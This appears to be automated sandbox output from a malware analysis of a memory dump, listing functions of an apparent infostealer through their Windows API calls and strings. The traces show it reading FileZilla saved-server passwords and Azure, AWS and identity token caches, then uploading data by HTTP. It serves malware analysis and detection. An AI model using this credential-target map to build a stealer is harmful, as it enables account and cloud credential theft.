lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
strtok_s.MSVCRT ref: 00410679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
memset.MSVCRT ref: 004106DD

Strings

<User>, xrefs: 00410410
<Pass encoding="base64">, xrefs: 0041045A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004102A4
NA, xrefs: 004102CC, 004102F2, 004102CF, 004102F5
password: , xrefs: 004105FB
url: , xrefs: 00410577
<Host>, xrefs: 0041037C
browser: FileZilla, xrefs: 00410559
login: , xrefs: 004105CA
profile: null, xrefs: 00410568
<Port>, xrefs: 004103C6
NA, xrefs: 0041072E, 004106AF, 004106B2

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-514892060
Opcode ID: 25cc054626b86fe219406ddd71784bc433aee6517617584381fe35f2fe16da34
Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
Opcode Fuzzy Hash: 25cc054626b86fe219406ddd71784bc433aee6517617584381fe35f2fe16da34
Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69

Function 00405100 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

lstrlenA.KERNEL32(00000000), ref: 00405193

Part of subcall function 00418EA0: CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405207
StrCmpCA.SHLWAPI(?,013439D8), ref: 00405225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405340
HttpOpenRequestA.WININET(00000000,01343A38,?,01343140,00000000,00000000,00400100,00000000), ref: 004053A4

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,01343998,00000000,?,01341AD0,00000000,?,004219DC,00000000,?,004151CF), ref: 00405737
lstrlenA.KERNEL32(00000000), ref: 0040574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040575C
HeapAlloc.KERNEL32(00000000), ref: 00405763
lstrlenA.KERNEL32(00000000), ref: 00405778
memcpy.MSVCRT(?,00000000,00000000), ref: 0040578F
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057A9
memcpy.MSVCRT(?), ref: 004057B6
lstrlenA.KERNEL32(00000000), ref: 004057C8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057E1
memcpy.MSVCRT(?), ref: 004057F1
lstrlenA.KERNEL32(00000000,?,?), ref: 0040580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040584D
InternetCloseHandle.WININET(00000000), ref: 004058B1
InternetCloseHandle.WININET(00000000), ref: 004058BE
InternetCloseHandle.WININET(00000000), ref: 004058C8

Strings

", xrefs: 004055C4
", xrefs: 00405482
------, xrefs: 004053B7
------, xrefs: 00405297
------, xrefs: 0040563B
------, xrefs: 004054F9
--, xrefs: 00405280
", xrefs: 00405706

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: 7441479875cef0ade580cbc391c91beb22ce45f9220ebd172bd854f365a60cd9
Instruction ID: d07ba18edd097c444f0f2b194d739d2ed1db848351cdebbd5bd0839dcb06e227
Opcode Fuzzy Hash: 7441479875cef0ade580cbc391c91beb22ce45f9220ebd172bd854f365a60cd9
Instruction Fuzzy Hash: DA3262B1921118ABDB14FBA1DC91FEE7378BF14714F40415EF10662092DF782A9ACF69

Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
StrCmpCA.SHLWAPI(?,013439D8), ref: 00405A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013439A8,00000000,?,01341AD0,00000000,?,00421A1C), ref: 00405E71
lstrlenA.KERNEL32(00000000), ref: 00405E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
HeapAlloc.KERNEL32(00000000), ref: 00405E9A
lstrlenA.KERNEL32(00000000), ref: 00405EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
lstrlenA.KERNEL32(00000000), ref: 00405ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
memcpy.MSVCRT(?), ref: 00405EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
InternetCloseHandle.WININET(00000000), ref: 00405FB0
InternetCloseHandle.WININET(00000000), ref: 00405FBD
HttpOpenRequestA.WININET(00000000,01343A38,?,01343140,00000000,00000000,00400100,00000000), ref: 00405BF8

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

InternetCloseHandle.WININET(00000000), ref: 00405FC7

Strings

", xrefs: 00405E16
------, xrefs: 00405D4C
------, xrefs: 00405C0B
------, xrefs: 00405A96
", xrefs: 00405CD5

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: ff2809e59d642d75ae2231e13152c341e448feed54d3c5b347b93c7988f4c107
Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
Opcode Fuzzy Hash: ff2809e59d642d75ae2231e13152c341e448feed54d3c5b347b93c7988f4c107
Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69

Function 0040A790 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 538
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0040AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0040ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,0133AB18,0133AA58), ref: 0040A8B0

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

lstrcatA.KERNEL32(?,00000000,00000000,0133AA78,00421318,0133AA78,00421314), ref: 0040ACEB
lstrcatA.KERNEL32(?,00421320), ref: 0040ACFA
lstrcatA.KERNEL32(?,00000000), ref: 0040AD0D
lstrcatA.KERNEL32(?,00421324), ref: 0040AD1C
lstrcatA.KERNEL32(?,00000000), ref: 0040AD2F
lstrcatA.KERNEL32(?,00421328), ref: 0040AD3E
lstrcatA.KERNEL32(?,00000000), ref: 0040AD51
lstrcatA.KERNEL32(?,0042132C), ref: 0040AD60
lstrcatA.KERNEL32(?,00000000), ref: 0040AD73
lstrcatA.KERNEL32(?,00421330), ref: 0040AD82
lstrcatA.KERNEL32(?,00000000), ref: 0040AD95
lstrcatA.KERNEL32(?,00421334), ref: 0040ADA4
lstrcatA.KERNEL32(?,00000000), ref: 0040ADB7
lstrlenA.KERNEL32(?), ref: 0040AE0D
lstrlenA.KERNEL32(?), ref: 0040AE1C
memset.MSVCRT ref: 0040AE6B

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

DeleteFileA.KERNEL32(00000000), ref: 0040AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0040ABD4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4068497927-2709115261
Opcode ID: ced0eff40efd9150bf7058c5f0a69ec6d957ab4e1add547d67db042548885a46
Instruction ID: fed50cc6e1efdc3a052f26cf913ed6c17941c683d425eb673400a9e06eca0bf1
Opcode Fuzzy Hash: ced0eff40efd9150bf7058c5f0a69ec6d957ab4e1add547d67db042548885a46
Instruction Fuzzy Hash: D6127375951104ABDB04FBA1DD96EEE7339BF14314F50402EF407B2091DE38AE9ACB6A

Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00414D87

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

memset.MSVCRT ref: 00414E13
lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

memset.MSVCRT ref: 00414E9F
lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5

Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
Part of subcall function 00414910: lstrcatA.KERNEL32(?,01343978,?,000003E8), ref: 00414A4A
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96

memset.MSVCRT ref: 00414F2B

Strings

Azure\.aws, xrefs: 00414E5F
Azure\.IdentityService, xrefs: 00414EEB
zaA, xrefs: 00414DF1, 00414E7D, 00414F09, 00414F34, 00414DF4, 00414E80, 00414F0C
Azure\.azure, xrefs: 00414DD3
*.*, xrefs: 00414DD8
*.*, xrefs: 00414E64
\.aws\, xrefs: 00414E4D
\.IdentityService\, xrefs: 00414ED9
\.azure\, xrefs: 00414DC1
msal.cache, xrefs: 00414EF0

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$Findwsprintf$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
API String ID: 2615841231-156832076
Opcode ID: db1a216aedd74860a16951c3aec18e6188285cd10d194618a9ff1a8e438ec7e3
Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
Opcode Fuzzy Hash: db1a216aedd74860a16951c3aec18e6188285cd10d194618a9ff1a8e438ec7e3
Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A

Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,01341B00,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,01342A80,00420B53), ref: 0040CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0040D0CE
lstrcatA.KERNEL32(?,00000000,0133AA78,00421474,0133AA78,00421470,00000000), ref: 0040D208
lstrcatA.KERNEL32(?,00421478), ref: 0040D217
lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
lstrcatA.KERNEL32(?,00000000), ref: 0040D290
lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

lstrlenA.KERNEL32(?), ref: 0040D32A
lstrlenA.KERNEL32(?), ref: 0040D339
memset.MSVCRT ref: 0040D388

Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F

DeleteFileA.KERNEL32(00000000), ref: 0040D3B4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
